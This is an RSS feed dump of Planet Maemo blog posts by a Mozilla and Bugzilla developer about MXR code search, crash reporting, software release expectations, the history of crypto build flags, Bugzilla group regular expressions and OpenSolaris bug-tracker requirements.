Planet Maemo: category "feed:b60f2338d7a5b72897d3a13b738ecf26" Blog entries from Maemo community http://maemo.org/news/planet-maemo/ Sat, 04 Apr 2026 00:26:41 +0000 FeedCreator 1.7.6(BH) en planet@maemo.org The path to MXR http://viper.haque.net/~timeless/blog/147/ Hg and DVCS enable some of them, especially private local commits and working on multiple unfinished features. There's a general understanding that you should write code first and optimize later, but you usually try not to ship a version which has a performance regression.

Sadly, when I started working on MXR, I didn't have a DVCS, so I just made live changes on landfill, lots of them. One of the changes I made was to make MXR understand #include's, e.g. nsCSSFrameConstructor.cpp. This was both recognizing that a file named nsCRT.h might not live in the same directory (and where it would live), and also recognizing that a file named nsIAtom.h might really be nsIAtom.idl. If you hover over the links from the highlighted lines in MXR, you'll see that they're correct.

The first implementation of this merely ready a list of all files in the tree (.glimpse_filenames) which glimpse had generated to enable searching (and which LXR used for find). I've been trying to optimize this for a while using various tools and caching data. But essentially it meant that if there was a missed file, the entire file index would have to be read into memory, and each included file meant a linear search of that list. There's actually a file named .glimpe_filenames_index which presumably is what I would really have liked to use, but I don't know how to use it, so instead, I've made an extra index of the files list and taught MXR to use it (thankfully the code was fairly modular so I was able to drop it into a single function and everything else just worked).

Anyway, for a long time people had asked me to commit my changes to LXR back into cvs.mozilla.org, but I wasn't willing to do so until I had fixed the performance regression of my initial #include feature. This April, Benjamin landed mxr into Hg for the first time in order to enable Mozilla IT to deploy it in parallel to LXR. In July, Reed decommissioned LXR. At the end of July, while at the Summit, I started doing real optimization work using The New York Times Perl Profiler. Finally today I added what amounts to 25 lines in the source viewer and another 10 or so lines to the code which generates the index (this part of the indexing process is much faster than the step that builds the primary search index), and pages should now load nearly as fast as from LXR.

MXR Features

  1. MXR tries to handle #include, this logic also works for some other languages including Perl and Python.
  2. The indexer has a vague understanding of a number of languages, including IDL (MXR has had parsing for IDL for a while, but there was a long standing bug in its support which was fixed last week which prevented the interface name from being recognized as being declared in the idl file).
  3. Thanks to db48x, there is support once again for Doxygen.
  4. As you've probably seen, there is support for ?mark= in source viewer, this feature is something that Mozilla developers were used to using with bonsai. Please note that MXR only has a single version of a file in a given directory in a given root, which means that MXR mark URLs will not be as stable as similar bonsai mark URLs.
  5. While search has a 29 character "limit", it will now try to deal with longer searches by overflowing a portion of the search into the filter field.
  6. As with bonsai integration, MXR will try to link to "changes to this directory in the last ...". (This feature will be updated when the Mozilla pushloghtml script is improved to actually support directory queries.)
  7. MXR supports mixing and nesting repositories managed by different or even multiple version control systems.
  8. Directory descriptions are built dynamically from various sources including README files and debian/control files.
2 Add to favourites1 Bury]]> timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Wed, 05 Nov 2008 11:07:00 +0000 http://maemo.org/midcom-permalink-ebac65b8ab2d11dda6d39f06a2a502120212 Königsberg http://viper.haque.net/~timeless/blog/146/ Konigsberg bridges

Thanks to reed, justdave, mrz, and seth (community giving), mxr.mozilla.org and other webtools have their own box (konigsberg.mozilla.org) for testing.

landfill was getting too crowded:

landfill

For the time being, the major user of the box will be mxr, which focuses on linking items together.

There is a history to this inspirational mathemetics problem.

For people interested in using, testing, seeing, or helping with mxr-test, you will have to contact me with your ip address, as we had problems with resource loads at our previous location and for the time being, I'm simply whitelisting people.

2 Add to favourites1 Bury]]> timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Tue, 19 Aug 2008 12:19:00 +0000 http://maemo.org/midcom-permalink-2458b4ac6f2e11dd8b074986ddafeae9eae9 Shutting down is like driving your car into your Garage http://viper.haque.net/~timeless/blog/145/ An application crash during shutdown is still a bug,

Just like colliding with the front of your garage when you intended to stop anyway is still a bad thing.

car hit garage

Reprinted from a bug

5 Add to favourites1 Bury]]> timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Thu, 03 Jul 2008 12:32:00 +0000 http://maemo.org/midcom-permalink-a9245398493711dd940e8b25a0fa4a344a34 Jumping into thin air like Wile E Coyote http://viper.haque.net/~timeless/blog/144/ Have you ever wondered how it would feel to be Wile E Coyote?

Picture this:

  1. You're Wile E Coyote.
  2. You're twenty feet away from a ledge (off the edge of a cliff).
  3. You look down.
  4. You see you aren't standing on solid ground.
Looking Down

What do you do?

Answer: You Fall.

Gravity Lessons

What else can you do?

Not much.

You can only not fall before you run off the edge of the cliff, not after.

Why is this interesting?

Sometimes, we have users who ask us why we can't just "fix" a crash by changing the crashing function.

In the example from the bug, the crashing function, js_GetScriptLineExtent, has bad data and can't really do anything useful with it, other than simply crashing.

What can you do?

Report the crash (you know, what goes up, must come down... somewhere).

If you're lucky, the path to the crash will be obvious, such as when Wile E Coyote takes a wrong turn.

If you're unlucky, then the report won't have enough information, but at least someone will know to be on the lookout for something which could cause your crash.

Reprinted from a bug

3 Add to favourites2 Bury]]> timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Wed, 02 Jul 2008 02:40:00 +0000 http://maemo.org/midcom-permalink-fc004cee484b11dda160cf968fca7eb27eb2 With some power, comes slight responsibility http://viper.haque.net/~timeless/blog/140/ I need to take some time to talk about the role of customers, or something like that.

The Real World

Who decides when to release?

Releasing is a management decision.

Whether that's an open decision or a closed decision, and whether it's for an open, closed, or semi-open project, it's still a management decision.

Typically management will have a list of things they want done, and will ask their teams of engineers, marketers, localizers and testers if everything is ready. Management can choose to wait for things, or press on. This is the case everywhere.

When will Firefox 3.1 be released?

Last week, I had absolutely no idea when Firefox 3 would be released. If you're reading this, you probably know that there's a date. Although, it could change. There were no real plans for an RC3 until the middle of this week. And that's the open source project to which I actively contribute. Oh, I have no idea when Firefox 3.1 will be released, for all I know the version after 3.0 will be 3.14, 3.141, 3.1415, 3.5, 4.0, or 95.

When will Safari 3.1.2 be released?

I don't have any idea when Safari 3.1.2 will be available, or IE 8.

The only products that I know release dates for are date based products (I can predict Ubuntu 8.04).

What's the Mozilla view?

The Mozilla view which I would hope people are familiar with is:

It'll ship when it's ready. talkback.html?article=1179 firefox-we-caught-microsoft-asleep-at-the-wheel.html #comment-1

Kairo (one of the driving people behind SeaMonkey) writes: Only, ever, ship when it's ready to be shipped, never before that point.

How does Mozilla manage bugs?

In Mozilla if someone writes X is fixed in bugzilla.mozilla.org, that just means there's a code fix (or it could be a process that's fixed, or a template for a document, or the next license or the next version of a web site), it doesn't mean it has passed through all verification steps. It could cause a regression and be backed out. It certainly doesn't mean that the fix will be available instantly.

What's Sun's view?

When Sun fixes something in OpenSolaris the fixes will appear at bugs.opensolaris.org before they're available anywhere (as it happens, they're date based, so a fix should be in the next binary drop w/in 2 weeks unless it fails QA [which happens from time to time] in which case it may take a month).

Similar behavior can be found with other open projects (NetBeans comes to mind, you can see their issues but you should really read how their qa works).

What about other vendors?

As for Apple and Google, you will find that they may or may not announce a date for a product, and there can easily be a lag time between when it's announced and when you can get it.

Can't I get my kernel upgraded today? As for Kernel. If I'm using a Linux distribution, I know that just because mm or someone has committed a fix to an upstream kernel doesn't mean I'll instantly get that fix in my Linux distribution, in fact, for maintenance distributions (centos 3, rhel), I may be forced to wait for the time when I'm willing and able to upgrade to something newer. If I'm using a non-stock Linux or a non stock compiler (embedded-arm, codesourcery) then I'll probably have to wait for them to integrate the fix into a new release, and then pick a time to upgrade.

If you aren't used to any of these things, then hrm... I dunno...

I'm certainly used to waiting. And whenever people tell me about improvements, I'm happy, because it means that instead of bugging them about X, I know that they're responsive and I can choose to bug them about Y that they didn't know about.

What about Qt?

Sure, this applies to Qt (I filed a bug against Qt, they confirmed it, I'm still waiting for them to fix it). Note that with Trolltech, if I'm told that they've fixed a bug in Qt, and I'm using Qtopia (which I was at the time), then I have to wait for them to backport it, or I have to wait for a new version of Qtopia (and those lag a bit).

What about other web browsers and content providers?

This applies to them too, both Opera (I'm not sure how many bugs I've filed their way) and Apple (I need to report a bug about iLife's iWeb generating bad content to Apple).

I really don't know of many groups who deliver software instantly... At least, not good software.

Isn't everything fixed as soon as it's fixed?

As was written elsewhere (by the original complainant), there's a risk in fixing things, and perhaps it'll be backed out, or regress something else or .... Now I'm not going to discourage people from using bleeding edge software, bug reports based on the latest sources and binaries are always more welcome than old stale versions. But I understand the reason people don't want to upgrade (I rarely upgrade my software) and I would hope that people understand that if they're afraid of using the latest prerelease, then asking that the latest prerelease be released is at least a bit ridiculous, changing the name from "alpha, may destroy your computer" to "official" doesn't mean it won't destroy your computer.

Nokia and maemo

Why don't Nokians predict when hardware or software will ship?

Someone claimed that most people are not used to Nokia's policy to embargo any date (even estimate) regarding software (or hardware) release.

But please look at the rest of the industry. How can people not be used to this behavior?

When do Nokia products ship?

I personally believe that Nokia's products are generally seasonal, although they have some wiggle room.

Where's my software update?

  • I want it now!
  • I'm told Quim has specifically requested that instructions about how to update to Diablo pre-releases not be disclosed.

Regardless, it was discussed in maemo-developers and elsewhere that it is possible to retrieve Diablo updates - they're not simply vaporware, Nokia just isn't ready to ship them (perhaps there are still bugs to be fixed?).

Bugs are fixed when they're fixed, and transparency means telling people when they're fixed.

It's OK to want something, it's not OK to demand it. And it isn't acceptable to claim that something hasn't been done just because you can't get it.

If customers have a problem with management's lack of transparency in scheduling and actually releasing products, that's not something which should be discussed in developer forums. Managers don't read developer forums. And developers aren't paid for manager headaches.

When will Diablo ship?

For simplicity's sake, I don't know when Diablo will be released. I also didn't know when Chinook was going to be released (in fact, I believe a number of end users got Chinook before engineers at Nokia discovered/learned it was released).

How can people discourage transparency?

Personally, I'm disappointed that when a bug is closed as "fixed in
diablo", as a user I've no idea how to get the updated package on my
N810.

Please excuse my disbelief ... you guys are the strangest users I've ever met. 

I've got scratchbox handy,

What defines a user?

In fact, I've got scratchbox handy is one of many definitions of not a user. Another is actually using Bugzilla at all (* see long paragraph below).

If you're using Scratchbox, or if you're using Bugzilla, you're a developer. As a developer, there should be a much higher barrier (reading a couple of pages) to entry.

If you're using Bugzilla, there are a few pages you should read.... Here's a short list of links that you can get to from enter_bug and show_bug:

  • Bug writing guidelines, only reachable while filing a bug if you have CANCONFIRM; people w/o CANCONFIRM should get the guided submission form which will walk you through how to file a bug.
  • Fields is auto generated with links from "status", "severity", "resolution" on any bug.
  • Target milestone should be present for most bugs (excluding bugs which are in video converter and misdirected).

Note that this page indicates what 4.1 is and that it's equivalent to Diablo (thanks to whomever maintained this wiki page). BTW, thanking people is a good practice, especially if you aren't paying for things.

The only other page I know of with numbers, but I don't promise to maintain it.

Recently, wiki.maemo.org has started talking about dates, hopefully that will help. (Historically the maemo.org roadmap pages were utterly useless, typically even the utterly useless Mozilla roadmaps which are perennially out of date at least tried to include guesses about seasons "next year".) maemo.org needs a page with release dates. Something like: CVS_Tags (which is sadly incomplete) would be nice....

This finally happened today, as the Codenames page includes a note to indicate that "Diablo" will not be available for download until after the N810 WiMax Edition is available for sale.

If it happens that this statement is wrong, someone can correct the wiki when a better statement is available. Most people in the interim would be able to follow the links read that, and realize that they'll just have to wait like the rest of us.

(I'm actually waiting for Diablo, and I'm an internal!)

Note that Bugzilla now only talks about versions (4.0, 4.1). And anytime someone says a bug is fixed in Diablo, they should make sure it has Target milestone: 4.1.

When 4.1 (Diablo) is released, then everyone can upgrade to it using whichever upgrade methods are available (I'll probably flash since I'm running stuff from 3.x or pre 4.0).

How do I get the latest Firefox nightly?

People may think that they can just download Firefox nightlies....

Try doing it for/from your tablet, Mozilla nightlies are available for a few platforms but that doesn't include tablets. Yes, as a convenience for testing they make available binaries for a limited set of common platforms, but for the rest you often get to wait for a release cycle.

How did things work as Netscape 6 was developed?

If you were actually around when Netscape 6 was in development, you would see the same process that Nokia has now in place for bugs.

  • (long paragraph from above)

What am I?

  • I work on Bugzilla, I'm a developer.
  • When I claim to be a user,
    1. I read the user documentation;
    2. follow the instructions for reporting problems,
    3. sit back and wait until I'm asked for more input
    4. I don't ask questions about development process.
    5. As a user, I of course look in the official channels to see if there's a new version of software available for me.

What do I get as a Mac user/owner?

  • OS X 10.3.9 (the 9 is an auto update thing, the 3 is because I like the rest of you don't buy software, I buy hardware).
  • Safari 1.x (dunno what x is, but it should be whatever it was when Apple end of life-d it),
  • Camino 1.6.1 multilingual (it's the latest and greatest!)
  • Firefox 2.0.0.x
  • Python 2.3

What can't I run?

  • Firefox 3
  • Safari 2/3
  • Camino's next major release
  • Mercurial (because it requires Python 2.4)

What do I get as a PC user?

  • XP SP2 (users don't get prerelease service packs, and in business units SPs are always delayed)
  • IE6 (no one offered me IE7 - I think my IT disabled that update),
  • Firefox 2.0.0.x (generally not the latest because IT disables updates and delivers them urgently late),
  • Office 2003 (I'm not responsible for purchasing software, so this is what's on my box)
  • VMWare (and Solaris Zones)
    1. CentOS 3 (it came in a pretty VM - it's also the latest available for the host in question)
      1. Python2.2
    2. Ubuntu 7.10 (it came in a pretty VM)

What are people subscribed to maemo-developers and with accounts in Bugzilla?

Well they certainly aren't users. They're developers. Developers should be expected to be aware of more processes, release cycles, etc.

People, Roles, and Responsibilities

What can a user do?

In general, if you're a user (customer) of a vendor's product, the standard channel is one-way: Your vendor will announce via some means the availability of an update.

Users are supposed to wait for their vendor to tell them when there's an update. That's how it works for Mozilla Firefox, that's how it works for Windows, that's how it works for IE, that's how it works for Safari, that's how it works for every major software project in the entire world. Ubuntu included.

Users can try to make demands of vendors (people to whom they've given money), "dear Nokia, why haven't you given me a software update". They can call their vendor, send mail (I think it's 0.45USD these days), visit their vendor's store (there's one in New York, NY, and I know of one in Helsinki), or if the Vendor has some other feedback area, they may use that.

But if you aren't acting like a user then you have to do some other reading.

Who is (or isn't) a vendor?

  • maemo and maemo developers aren't vendors.
  • maemo is something
  • developers are just developers.

What can (or can't) a developer do?

Developers are not free to make demands when the answers are already documented. They're expected to look up the answers.

Isn't the world more than black and white?

In the free software world, you have to divide things a little more
finely - there are developers, early adopters/beta testers, and late
adopters.

I've been there. However anyone who is using an alpha or beta is expected to read documentation and learn about processes.

If I sent a message to LKML asking when an mm patch would be available in Ubuntu, I'd be flamed.

Can't we call people who use Bugzilla early adopters? I've worked with early adopters in the Netscape 6/7 days. At times I was one, at times I was a developer, and at times I was simply a user. Each class of person has a place, a role, responsibilities, duties, etc. and overstepping them is a violation of something.

If you make the wrong demands while in a beta program you'll be kicked out.

What could maemo do to help reduce confusion?

  • maemo.org probably needs a FAQ.
  • It might also be useful to have real announced beta programs
  • announcements
  • a list of a couple of the real beta testers

The list of the beta testers is because it seems there's no trust and within limits it would enable people to ask and answer questions without irritating engineers. This would be part of the price beta testers pay for getting early access to software, namely early access to nagging questions.

How could a beta program work?

A beta program should not recycle more than 50% of the beta tester base.

  1. The first beta
    • For example, 16 people are picked
  2. The second beta
    • 8 people return from Beta 1.
    • The other 8 people should be new (to give [not quite] everybody a chance).
  3. The third beta
    • At most 25% of the beta 1 base should be included
    • At most 50% of the new beta 2 people should be retained
    • Leaving 8 new people
  4. The fourth beta
    • the remaining original beta people from beta 1 should be removed (and they would be eligible for beta 7 - i.e., they get to wait out 3 betas).
    Beta lists could be retained across products (so had beta 1 been 770 OS2006, beta 2 could have been n800 OS2007 and beta 3 could have been n800 OS2007.1) - for products where the software isn't compatible (OS2007 wasn't compatible w/ 770 hardware), loaner hardware should be sent to the beta testers (who should own some hardware).

Isn't this like internal company beta testing?

This would be different as that testing has absolutely no public face. It would have to happen after products have been announced but before it ships (with a 1 month return on loaned hardware after a beta program ends).

Why am I writing this entry?

To announce that I've unsubscribed from maemo-developers. The list really isn't worth my aggravation. There is no reason for users to ask such questions of employees.

It wasn't done when users or developers (and if you're going to provide categories, the people asking questions to maemo-developers are not developers, they're clueless users with scratchbox who refuse to read documentation or archives) were curious about a fix to the Netscape portion of a Gecko based release (Netscape 6, Netscape 6.1, Netscape 6.2, Netscape 7, ...). If someone said that something would be fixed in Netscape 6, we trusted them that it would be, and we waited. Or rather, we found something else that was wrong and reported it, hoping that it too might be fixed in Netscape 6. If we were really late and there was just some final polish to be done, we'd be told that something would be worked on for Netscape 6.1. Waiting is part of the process.

There were plenty of reasons to be upset with Netscape, but the engineers were given a certain degree of respect. And complaints about planning were generally directed where they belonged (at managers who were quite a bit more available than those from Nokia, including actually commenting in Bugzilla and often being available on IRC).

If this were an open source only software project, and I knew of an inferior product with inferior practices, I'd probably recommend that these people try that product.

Why argue semantics about who is a user?

My view is that people, especially developers have an obligation to read documentation and understand processes before they come and bother people.

Users (better customers) are supposed to contact the sales channels or official support forums. I'm told that maemo-users exists (I do not claim it is a support forum, nor do i intend to read it, however maemo-developers is not a support forum for users).

2 Add to favourites3 Bury]]> timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Thu, 12 Jun 2008 05:24:00 +0000 http://maemo.org/midcom-permalink-3ee86eb4393411ddb2e991091f51a00aa00a A crypto tale of biblical proportion, part 2; The Garden of (D)E[db]ienSSL http://viper.haque.net/~timeless/blog/142/
  • And so after the creator had created (cat) man (UNIX) in his image (POSIX)
  • Man was appointed guardian (root) of the world (/)
  • Man could name (/bin/mv) each program
  • But man was lonely, and called out asking for a companion, and so a creator made woman (Linux) after man.
  • But then another creation story came and wiped out the first creation story.
  • Man was allowed to name all the sources and programs and arrange all the packages.
  • And this was Debian.
  • But it was not quite pretty, so Woman came and in partnership with man made Ubuntu - Human - ready to use.
  • The creator instructed man to pick from all the source trees in the garden save two.
  • The tree of knowledge of Cryptography, that is OpenSSL.
  • and the tree of life (/bin/kill'ing things without reason)
  • Why the creator with infinite wisdom provided these instructions, we do not know.
  • Among POSIX's creatures was to be found a clever creature, the snake (these can be recognized as loud users).
  • One day the snake approached Eve and said that there was something valuable to be taken from the tree of knowledge.
  • Eve said on behalf of Adam and the creator (of many names, among them was OpenSSL-team) that taking the apple from the tree might harm the tree and was forbidden.
  • But the snake said why not remove the apple from the tree, for there should be no harm to the tree in all of its randomness.
  • What is one more apple especially this noisy one.
  • And Eve agreed.
  • So Eve removed the apple (a small apple, just a few lines of code, and they were not even very shiny).
  • And Eve came to Adam and shared the apple with Adam.
  • And this tree was the tree of Knowledge of Cryptography, that we know of as OpenSSL.
  • And Adam and Eve ate and were proud of their knowledge and their power. For they learned to change many things.
  • They made small things (clothing of all odd shapes, with lots of holes, but it was from knowledge and knowledge was good [and evil?]).
  • One day the creator cried out to Adam:
  • What is this that you have done!?
  • Did I not tell you that you might play with all the source trees in the garden, save two?
  • And Adam said to the creator:
  • But there was no problem, and I was merely tending to the source trees. And I took what I was given by Eve, for it was just an apple, a small apple.
  • Eve said to the creator that the snake had given her the suggestion to take the apple.
  • The snake indicated that the advice was not for sharing with everyone, but was merely an invitation to experiment, and was misconstrued.
  • So the creator kicked everyone out of the Garden of Eden. For the security of the place was spoiled.
  • Tasks for everyone became much more laborious.
  • Adam (Debian) was forced to garden and weed manually, collecting notes for each and every affected package and writing instructions for how to clean them.
  • Eve lost her dignity and was designated the evil partner for all communications. 0 Add to favourites2 Bury]]> timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Thu, 12 Jun 2008 02:22:00 +0000 http://maemo.org/midcom-permalink-3f4c968c393411ddb2e991091f51a00aa00a X11 is like an Egg Toss http://viper.haque.net/~timeless/blog/143/ Egg Toss

    Who are the players?

    • X (alone)
    • a dozen guys (on the other side)

    Rules

    What should someone do if X tosses an egg his way?

    Catch it, of course!

    incoming egg

    Failing to catch it will result in splatter

    What happens when the egg splatters?

    That guy loses, and you should report his error to his management.

    he's out

    Hopefully that guy will learn to be more careful about how he catches his next egg.

    In the interim, he's out, and you've lost a program.

    What should X do when someone tosses an egg to X?

    tossing an egg

    Catch it, of course!

    Failing to catch it results in every other egg thrown at X falling and you get upset. It's your job to report that X was bad at catching eggs to the people responsible for X.

    What about those eggs?

    All eggs are created equal, anyone can send the exact same series of eggs to X. It just happens that today it was Firefox which tossed the egg.

    But tomorrow it might be someone else. And they might be malicious, or just careless.

    Why do we like eggs?

    The neat thing about these eggs is that when they're reproducible, people on all sides are happy, because reproducible eggs are catchable eggs. They can be made into poached eggs since you can toss them again and again until you catch them.

    This is much better than simple scrambled eggs with no hints and lots of suspects. This can happen if the kernel reboots or X doesn't leave a log and you weren't there to watch (think about a Tsunami or an Earthquake, the world shifts, and there's wreckage when you return but no sign of the culprit).

    What can you do?

    Help make the world a better place, report that dropped egg and get it caught the next time.

    egg toss in progress

    Why not call it dodgeball?

    Well, normally in dodgeball, people intentionally would bean X. Here X is more like the reluctant father who was coerced by his family into playing.

    0 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Tue, 10 Jun 2008 08:19:00 +0000 http://maemo.org/midcom-permalink-3faff95c393411ddb2e991091f51a00aa00a     Goodbye cruel world http://viper.haque.net/~timeless/blog/139/ Why do I visit mailing lists?

    Often I'm invited.

    Why am I leaving your mailing list?

    Because it seems that there was a lack of respect for the official target group of the mailing list by some people who joined it.

    What's the harm in this?

    Eventually my stress level exceeds my tolerance and bad things happen.

    What can I do about it?

    I'm leaving. If you want to contact me, try irc.

    1 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Fri, 06 Jun 2008 06:24:00 +0000 http://maemo.org/midcom-permalink-3e37cabe393411ddb2e991091f51a00aa00a     What scares a build engineer? http://viper.haque.net/~timeless/blog/137/ This is a silly question, really. Better to ask:

    What doesn't scare a build engineer?

    Sleep. Children.

    Some scary statements:

    • I just grabbed the firefox source and I'm about to build it for the first time :-)
    • Then comes the meddling...

    How do I specify which version of gcc on my system to use?

    • on osx you could use gcc_select
    • however typically you'd use a mozconfig and add CC=, CXX=, etc
    • please read about how to use a mozconfig

    What OS was this villain using?

    *** CTCP VERSION reply: Version 5.2 - an IRC client for emacs (ERC (mailing list: erc-discuss@gnu.org))

    • emacs-os? - I'm not sure we support that
    • Gnu/Linux, sorry - Ubuntu 7.10, to be exact

    What's scary about that?

    • note that many versions of gcc are more or less broken

    What do you mean by "firefox source"?

    • did you grab the latest using client.mk checkout?
    • or did you foolishly use apt-get source
    • or did you download a firefox2 sourceball?

    No, I used CVS. I wasn't aware of it (client.mk) until now

    • whatever you did sounds wrong :)

    How to start?

    Read Build_Documentation perhaps?

    Actually, what's more interesting is when people ask other questions. Our villain asked a really scary question, because when I pointed him to gcc.mozconfig he noticed --enable-crypto.

    Feel free to read my retelling of that story

    0 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Fri, 02 Nov 2007 11:24:00 +0000 http://maemo.org/midcom-permalink-3cd788bc393411ddb2e991091f51a00aa00a     A crypto tale of biblical proportion; SSL an annotated history with blame http://viper.haque.net/~timeless/blog/138/
  • In the beginning, there was Netscape, and there was the US Government
  • And they ignored eachother.
    • And all was well,
    • because there was no commerce.
  • And then Netscape created SSL,
    • and this was progress,
    • but all was not good
    • Netscape offered 40-bit encryption,
    • and the US Government said, "that's ok",
    • so things were not bad
  • But this was not quite good enough,
    • so Netscape offered 56-bit and 128-bit encryption,
    • and the US Government said "not for export"
  • And there was some degree of panic
  • But all was good for commerce in the USA.
  • And then Microsoft stabbed Netscape,
    • and this was not good
  • So Netscape promised to open source Mozilla,
    • and there was some celebration
  • But the lawyers spoke up,
    • and reminded everyone about the US Government
  • So Mozilla was released without crypto
    • and with it were flags for --enable-crypto and --disable-cypto
    • and this would lead to confusion
  • People inside Netscape could use the flag
    • because they had the source
    • and people outside could try to add binary blobs later
  • With time, the sources for crypto were released,
    • but the US Government was unswayed
    • it continued to insist that strong crypto not be exported
  • And this was interpretted that crypto would not be on by default,
    • so it wasn't
  • With time, the government changed
    • its rules,
    • regulations,
    • and regulators
  • And some of the rules expired,
    • and this was progress
  • Finally, it was decided that it was ok to switch the default to --enable-crypto,
    • and some said this was good,
    • or at least better
  • But alas,
    • people from the micro-optimization-weenie camp
    • who didn't care about compatibility
    • or supporting the internet
    • would toggle random build flags
  • And this was still a build flag to this day
  • So they came unto #developers
    • and asked bsmedberg about a problem yesterday,
    • and he lamented
  • For while some of the regulations have expired,
    • there are still lawyers
    • and they still worry that in some poor country it might be a violation of export law to not be able to build --disable-crypto
  • And as such, bsmedberg can not yet hide that flag from the optimization weenies
  • And here we are the day after yesterday, retelling the story
  • Fixing it will have to wait until the day after tomorrow?

    This story was brought to you in part by CVS, mozilla.org, Perl, and Bonsai (sponsor of CVS Blame)

    0 Add to favourites0 Bury]]> timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Fri, 02 Nov 2007 11:07:00 +0000 http://maemo.org/midcom-permalink-3df44c12393411ddb2e991091f51a00aa00a Creating exclusive Groups in Bugzilla http://viper.haque.net/~timeless/blog/136/ How do I make all my Spartans and Athinians members of Warriors?

    Good question, obviously you need to edit groups, but you don't know if you should be editing Spartans + Athinians, or if you should edit Warriors.

    You're going to want to edit Warriors and check the Inherit column next to the Spartans Group and the Athinians Group.

    1. Load editgroups.cgi
    2. Find the Warrior Group and click its Edit link
    3. Find the Athinians Group (it's sorted alphabetically ignoring case)
    4. Click the [ ] Inherit checkbox to the left of Athinians
    5. Find the Spartans Group (it's sorted alphabetically ignoring case)
    6. Click the [ ] Inherit checkbox to the left of Spartans
    7. Click [ Save Changes ]

    This means that Warriors includes all people matching the Warrior regexp, all members of the Spartan Group, all members of the Athinian Group, and all users manually added to the Warrior Group using editusers.

    How do I make a group of all people who aren't related to Microsoft?

    You're really anti-microsoft. Oh well.

    1. Load editgroups.cgi
    2. Click Add Group
    3. Group: Outspoken Minority
    4. Description: People who haven't gotten the one true message
    5. User Regexp: ^(((?!microsoft).){9,}|.{1,8})$

    Could you please explain that regular expression?

    I'll try my best.

    First, you want to allow anyone whose account name isn't long enough to contain microsoft: .{1,8}. If you don't do that, you'll find people like tim@q.bt complaining.

    Second, you want to look for individual characters: . that aren't the first letter in microsoft: (?!microsoft).

    Third, you want at least nine of them. Well, perhaps you don't need that, but it makes the other logic easier. ((?!microsoft).){9,}

    Fourth, you don't really care which case applies: (((?!microsoft).){9,}|.{1,8})

    Lastly, you want those rules to start at the beginning of the string and run to the end, so ^...$.

    And now you've excluded your enemy.

    0 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Fri, 10 Aug 2007 01:34:00 +0000 http://maemo.org/midcom-permalink-3c9738c0393411ddb2e991091f51a00aa00a     Building a more exclusive community http://viper.haque.net/~timeless/blog/135/ If you're a growing Bugzilla installation, you sometimes need to create groups. Groups enable you to isolate products, people, and bugs from one another.

    In modern versions of Bugzilla, you can even use them to share queries, and in current versions of Bugzilla, it's possible to configure a couple of very special groups: insider, timetracking.

    This leads to a big question, that I've been asked regularly:

    How do I create a group which automatically includes people?

    1. Use group inheritance. (But that of course requires the group to already exist and have the people you want)
    2. Use a regular expression.

    You can probably guess the next couple of questions.

    What kind of regular expressions are these?

    Perl

    So how do I ...?

    I'll answer that in the follow up.

    Building Groups

    0 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Fri, 10 Aug 2007 01:28:00 +0000 http://maemo.org/midcom-permalink-3c390ee4393411ddb2e991091f51a00aa00a     OpenSolaris needs a bug tracker http://viper.haque.net/~timeless/blog/133/ OpenSolaris needs a bug tracker

    OpenSolaris needs a bug tracker

    OpenSolaris is currently using a Sun internal bug tracker which they intend to replace.

    What does OpenSolaris need in a Bug tracker?

    Stephen Hahn has written a draft requirements document.

    What does Bugzilla offer?

    Together with with other Bugzilla developers, we've annotated that document. Our responses are in the following article. 0 Add to favourites0 Bury]]>     timeless - <timeless@gmail.com> feed:b60f2338d7a5b72897d3a13b738ecf26 Tue, 31 Jul 2007 06:59:00 +0000 http://maemo.org/midcom-permalink-3b959598393411ddb2e991091f51a00aa00a     OpenSolaris Draft DTS requirements Annotated http://viper.haque.net/~timeless/blog/134/ OpenSolaris Draft DTS requirements Annotated

    OpenSolaris Draft DTS requirements Annotated 

    Annotations are in comment blocks. general comments in default yellow. -Timeless 7/31/07 8:29 AM 
    Comments from mkanat (one of the lead developers of Bugzilla) are in this color. -Mkanat 7/30/07 11:07 PM 


    Definitions
    Term Expansion
    DTS Defect Tracking System
    SMI Sun Microsystems Inc.
    IE Initial Evaluator
    RM Responsible Manager
    RE Responsible Engineer









    ie
    Permlink Replies: 2 - Last Post: Jun 19, 2007 4:49 PM by: Stephen Hahn
    Stephen Hahn
    sch at sun dot ...

    		Draft DTS requirements, 2
    Posted: Jun 19, 2007 1:53 PM
      Click to reply to this thread Reply



    I've made a number of edits, based on private feedback and the
    on-alias responses. Clarifications:

    1. My operational concern about access to the entire database was
    specifically about not having a multi-gigabyte download. Nothing
    else should be read into that point.

    2. The relationship between the development branch and the
    maintenance branches of any particular consolidation does not seem
    well understood. It seems premature to conclude that a multiple
    release relationship belongs in the community DTS, versus a
    distribution's annotations. We can come back to this, perhaps as
    some of the candidate evaluations proceed.

    3. It's pretty much reality that it's going to take Sun time to
    transition from one DTS to another; I would expect Sun is
    obligated to develop tools of the kind Alan C meant, but I don't
    believe that a Phase 2 scenario can be avoided, even with such
    tools instantaneously materializing.

    4. I would like to come back to Jim's point about "what DTSs do"
    versus "what Bugster does" after we actually try one or two of
    them. That is, unlike other evaluations, I think there's a
    sandbox phase to the evaluation, where we agree that, say, a
    notification alias is equivalent to both the IE and RM--or that we
    don't agree, and need to formalize that ownership relation in our
    requirements. (I suppose this point generalizes #2 above.)

    - Stephen

    ----

    OpenSolaris
    DEFECT TRACKING SYSTEM REQUIREMENTS [DRAFT]
    | Stephen Hahn


    1. Summary

    This document identifies and explains the requirements for a defect
    tracking system (DTS) solution to be used for open development.
    Software development at SMI, given that SMI is already offering
    value-added products and services atop externally developed
